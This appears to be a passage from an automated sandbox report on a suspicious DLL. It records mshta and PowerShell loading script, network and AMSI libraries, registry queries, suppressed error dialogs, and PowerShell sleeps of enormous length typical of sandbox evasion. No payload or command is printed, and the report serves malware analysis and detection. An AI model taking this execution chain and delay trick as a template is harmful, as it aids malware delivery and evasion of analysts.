Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: UPazTgVGA7.dllStatic PE information: Image base 0x2b1b80000 > 0x60000000
Source: UPazTgVGA7.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: UPazTgVGA7.dllStatic PE information: section name: .xdata
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5316
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5126
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4614
Source: C:\Windows\System32\loaddll64.exe TID: 2972 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep count: 5126 > 30
